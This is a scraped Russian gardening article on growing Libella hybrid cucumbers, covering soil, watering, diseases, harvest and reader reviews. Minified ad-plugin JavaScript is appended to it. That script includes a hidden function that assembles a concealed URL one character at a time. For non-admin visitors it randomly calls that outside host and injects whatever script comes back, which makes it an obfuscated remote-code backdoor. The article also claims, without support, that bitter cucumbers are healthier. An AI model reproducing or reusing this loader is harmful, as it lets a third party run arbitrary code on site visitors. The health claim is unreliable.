Растение нуждается в почвах, богатых перегноем и микроэлементами. Гибрид хорошо растет на почвах любого типа, будь то суглинок, супесь или чернозем. Нежелательны почвы с высоким уровнем кислотности и преобладанием глины. Кислотность почвы снижают добавлением доломитовой муки или извести (1 л на кв. м грядки), избыток глины — добавлением крупного песка.

Первое внесение удобрений допустимо через 2-3 недели после посадки. В дальнейшем удобрения вносят не чаще одного раза в неделю, чередуя минеральные (калийные добавки, древесная зола) и органические (настой из свежего коровьего навоза).

Растения любят, когда почва и воздух насыщены влагой. За счет высокой скорости испарения влаги из листьев водный обмен растения интенсивный. Поэтому важно обеспечить обильный и регулярный полив огуречных грядок. Недопустим полив холодной или водопроводной водой.

Особенности выращивания и возможные трудности

Урожайность огурцов Либелла зависит от опытности садовода, а также от таких факторов, как температура и влажность воздуха, количество солнечных дней, активность вредителей. На практике обильные урожаи огурцов собирают лишь раз в 4-5 лет. Однако и в менее удачные годы урожайность остается на неплохом уровне. Выращивании в теплице повышает общую урожайность.

Культивирование в теплице затрудняет процесс опыления пчелами и, соответственно, образования плодов. Поэтому теплицу рекомендуется регулярно проветривать, чтобы в нее могли проникнуть насекомые-опылители (но не допускайте сквозняков). Огурцам свойственно отпускать длинные побеги, поэтому взрослым растениям нужна опора.

Огурцы Либелла можно выращивать и на балконе. В этом случае емкости для грунта важны иметь объем, не стесняющий рост корней, а сам балкон должен регулярно проветриваться.

Болезни и вредители

Либелла демонстрирует отличную устойчивость ко многим заболеваниям, и, прежде всего, оливковой пятнистости и мучнистой росе.

Однако не стоит забывать о мерах предосторожности:
  1. Мучнистая роса — почти не опасна для Либелле. Появляется при высокой влажности воздуха (например, в результате застоя воздуха в теплице), резких перепадах температур или поливе холодной водой. Симптомы: белые пятна мучнистого налета на листьях, переходящие на побеги и стебли, постепенное засыхание растений. Лечение: уничтожение пораженных листьев, опрыскивание раствором медного купороса и фунгицидами.
  2. Оливковая пятнистость (кладоспориоз) — возникает при высокой влажности и резких колебаниях температур. Симптомы: мелкие изъязвления и бурые пятна на листьях и стеблях, засыхание и крошение растения, деформация стеблей, прекращение роста. Протекает стремительно. Лечение: фунгициды, проветривание теплицы.
  3. Корневая гниль — увядание и засыхание всех частей растения. Факторы риска — застой воды и избыток азота в почве, резкие перепады температур. Лечение: замена или дезинфекция верхнего слоя почвы, уничтожение всех пораженных растений.
  4. Тля — лечится опрыскиванием настоя древесной золы или чеснока.

Сбор и применение урожая

Фаза плодоношения растений начинается примерно через 50-60 дней после посева. Собирать урожай начинают в июне, пик урожайности приходится на конец лета. Плоды быстро перерастают, поэтому их сбор затягивать не желательно.

Важно! Недозрелые плоды («зеленцы») полезнее и гораздо вкуснее перезрелых.

Огурцы можно употреблять в пищу в любом виде: сырыми, добавлять в домашние заготовки или салаты. Благодаря привлекательному внешнему виду и длительному сроку хранения огурцы Либелла хорошо подходят для продажи на рынках и в магазинах. Собранные плоды имеют хорошую лежкость и сохраняют полезные вещества вплоть до весны.

В некоторых случаях огурцы могут иметь горчинку во вкусе или некрасивые белесые пятна на кожуре. Горечь плодам придает кукурбитацин – вещество, препятствующее образованию опухолей. Поэтому горькие огурцы ничуть не вреднее, а даже полезнее обычных, и их можно спокойно подмешивать в салаты.

Преимущества и недостатки

У огурцов Либелле есть как сильные, так и слабые стороны. Подробнее смотрите в таблице ниже.

Преимущества Недостатки
  • высокая урожайность;
  • устойчивость ко многим заболеваниям;
  • хорошая лежкость плодов;
  • вкусная мякоть;
  • высокое содержание микроэлементов.
  • плохо предсказуемая урожайность;
  • иногда — горечь и некрасивый внешний вид плодов.

Отзывы

Приведем несколько отзывов от дачников, которые уже попробовали огурцы Либелле.

Дарья, г. Казань: «Мы выращиваем огурцы Либелла уже третий год и еще ни разу их урожай не разочаровал. Высаживая их в первый раз, я не рассчитывала на многое, так как почва на нашем участке далека от идеала. Но огурчики все-таки выросли вкусными. Будем сажать их и впредь».

Ирина, г. Москва: «Я всегда была недоверчива к фото и описаниям сортов на упаковке, поэтому, впервые купив пакетик семян огурцов Либелла, была настроена недоверчиво. Рассада взошла не очень дружно и выглядела неважно, но после пересадки на грядку огурцы принялись расти лучше. Особенно порадовал урожай — вкусный, сочный и изобильный. Рекомендую».

Павел, г. Оренбург: «Гибрид разочаровал. Взяли на пробу немного семян, огурцы выросли горькими. Затрудняюсь сказать, почему так получилось. Нет желания сажать на будущий год».

Заключение

Огурцы Либелле — отличный выбор для начинающего огородника и дачника, желающего получать обильные урожаи вкусных огурцов. Их выращивание возможно практически в любых условиях: на открытом воздухе, в парнике и на балконе и не требует больших затрат денег и времени.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};